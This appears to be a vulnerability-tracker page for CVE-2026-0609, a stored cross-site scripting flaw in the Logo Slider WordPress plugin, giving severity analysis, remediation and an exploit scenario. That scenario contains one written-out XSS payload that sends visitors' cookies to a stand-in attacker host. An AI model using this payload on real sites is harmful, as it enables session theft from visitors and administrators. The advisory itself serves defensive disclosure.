Logo Slider Logo Carousel Logo Showcase Client Logo Slider Plugin
EUVD-2026-14168
|
CVE-2026-0609
MEDIUM
Vulnerability Assessment
| Weakness |
CWE
OWASP Top 10:2025
A05:2025 - Injection
ASVS 5.0
V1 - Encoding and Sanitization Output encoding, context-aware escaping
MITRE ATT&CK
2 techniques across 2 tactics: Initial Access, Execution The technique list with ATT&CK links and the kill-chain view is part of the Basic plan and up. |
| Impact | The CVSS 3.1 vector (AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N) indicates a moderate-severity vulnerability with network attack vector, low complexity, and low privilege requirements (author-level access), with cross-site scope impact and partial confidentiality and integrity impact. The 6.4 base score reflects the combination of these factors. Critically, the privilege requirement (PR:L) significantly reduces real-world risk compared to unauthenticated XSS, as attackers must already possess author or administrator credentials. However, the attack requires no user interaction (UI:N), meaning once injected, the malicious script executes automatically for all site visitors without additional clicking or social engineering. This makes the vulnerability particularly dangerous in multi-author WordPress environments where author accounts may be compromised or where trusted authors turn malicious. The lack of administrative action requirements (A:N) and the stored nature of the payload increase persistence and impact scope. While the CVSS score of 6.4 is above the medium threshold, the real-world exploitability is tempered by the prerequisite of valid credentials and limited to sites with multiple authors or weak author credential management. The vulnerability is not listed in CISA KEV, suggesting no active zero-day exploitation has been observed at scale, but the straightforward nature of the flaw and availability of plugin source code mean proof-of-concept exploitation is trivial to develop. |
| Exploit ScenarioDerived | An attacker with a compromised or disgruntled author account logs into a WordPress site and creates or edits a page containing the 'logo-slider' shortcode. In the image alt text field, the attacker injects malicious JavaScript such as <img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">. When any visitor (including administrators) accesses the page, the stored XSS payload executes in their browser, exfiltrating session cookies or performing admin-level actions on behalf of the victim. No additional user interaction is required; the attack is fully automated and persistent across all page views until the page is manually edited to remove the payload. |
Get an e-mail when this CVE is exploited, patched or re-scored. Free account.
Alert meAnalysisAIv1 – Mar 21, 2026
A Stored Cross-Site Scripting (XSS) vulnerability exists in the Logo Slider WordPress plugin (versions up to 4.9.0) that allows authenticated attackers with author-level privileges to inject malicious scripts through image alt text in the 'logo-slider' shortcode. The vulnerability stems from insufficient input sanitization and output escaping, enabling persistent script execution whenever users access pages containing the injected content. With a CVSS score of 6.4 and moderate real-world exploitability, this represents a credible threat to WordPress sites with multiple trusted authors.
RemediationAI
Immediately update the Logo Slider plugin to the latest patched version available from the WordPress plugin repository (https://wordpress.org/plugins/logo-slider-wp/). If an update beyond 4.9.0 has been released, upgrade to that version. Until patching is completed, limit author-level access to trusted users only, regularly audit user roles and capabilities, and consider temporarily disabling the 'logo-slider' shortcode via code removal or a security plugin until the patch is applied. For defense-in-depth, implement a Web Application Firewall (WAF) to detect and block XSS payloads in POST/PUT requests, enable WordPress security hardening plugins that sanitize shortcode output, and educate site administrators about the risks of granting author credentials to untrusted users. Review the Wordfence vulnerability advisory at https://www.wordfence.com/threat-intel/vulnerabilities/id/b94f388a-c4af-4d3a-bd41-9b2d5d990672?source=cve for additional context and timeline information.
Affected VersionsENISA
Affected Packages
Source: OSV (Open Source Vulnerabilities)
Affects your stack
Affects 1 package in euvd
Checking this CVE against your own stacks and servers is part of the Basic plan and up.
Technical ContextAI · show details
The vulnerability is a classic Stored XSS flaw (CWE-79: Improper Neutralization of Input During Web Page Generation) in a WordPress plugin designed to display client logos. The 'logo-slider' shortcode processes image alt text parameters without properly sanitizing user input or escaping output when rendering HTML. WordPress plugins typically process shortcode attributes via the do_shortcode() function and render them in the frontend via PHP echo statements; this plugin fails at both the sanitization stage (wp_sanitize_post_kses or similar functions were not applied) and the escaping stage (esc_attr() or esc_html() functions are absent). The affected product is identified by CPE cpe:2.3:a:logichunt:logo_slider_–_logo_carousel,_logo_showcase_&_client_logo_slider_plugin:*:*:*:*:*:*:*:*. The vulnerability affects all versions through 4.9.0, as confirmed by Wordfence threat intelligence and the WordPress plugin repository source code inspection at lines 309-314 of the public-facing class file.
Know when Logo Slider Logo Carousel Logo Showcase Client Logo Slider Plugin gets its next vulnerability
- Watch products and get an email when something new is published
- Check this CVE against your own stack and servers
- Exploit and PoC references, threat intelligence from 22 sources
No credit card · 7-day full trial
Severity by source
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Primary rating from Vendor (Wordfence) · only source for this CVE.
CVSS VectorVendor: Wordfence
DescriptionCVE.org
The Logo Slider - Logo Carousel, Logo Showcase & Client Logo Slider Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the image alt text in all versions up to, and including, 4.9.0 due to insufficient input sanitization and output escaping in the 'logo-slider' shortcode. This makes it possible for authenticated attackers, with author level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Executive ViewAI
Organizations using Client Logo Slider Plugin should be aware of moderate risk from CVE-2026-0609, a cross-site scripting vulnerability rated CVSS 6.4. Attackers could inject scripts to steal sessions or perform actions as authenticated users. Organizations should apply vendor updates when available and monitor for exploitation.
Apply vendor patch. If patching is delayed: implement CSP headers, enable HttpOnly cookies, deploy WAF XSS rules.
Threat Intelligence Overview
How this decision was reached
The engine reads each signal below and applies a fixed list of rules from top to bottom. The first rule that matches sets the recommended action – like a statement, every line is shown.
What every action level means
SSVC AssessmentENISA
Priority Score
Attack Technique
Cross-Site Scripting occurs when an application accepts untrusted data and sends it to a web browser without proper validation or encoding.
GHSA-68cq-6242-rqxv
NVD
CVE.org
EPSS
Vulnrichment
VulDB
Exploit-DB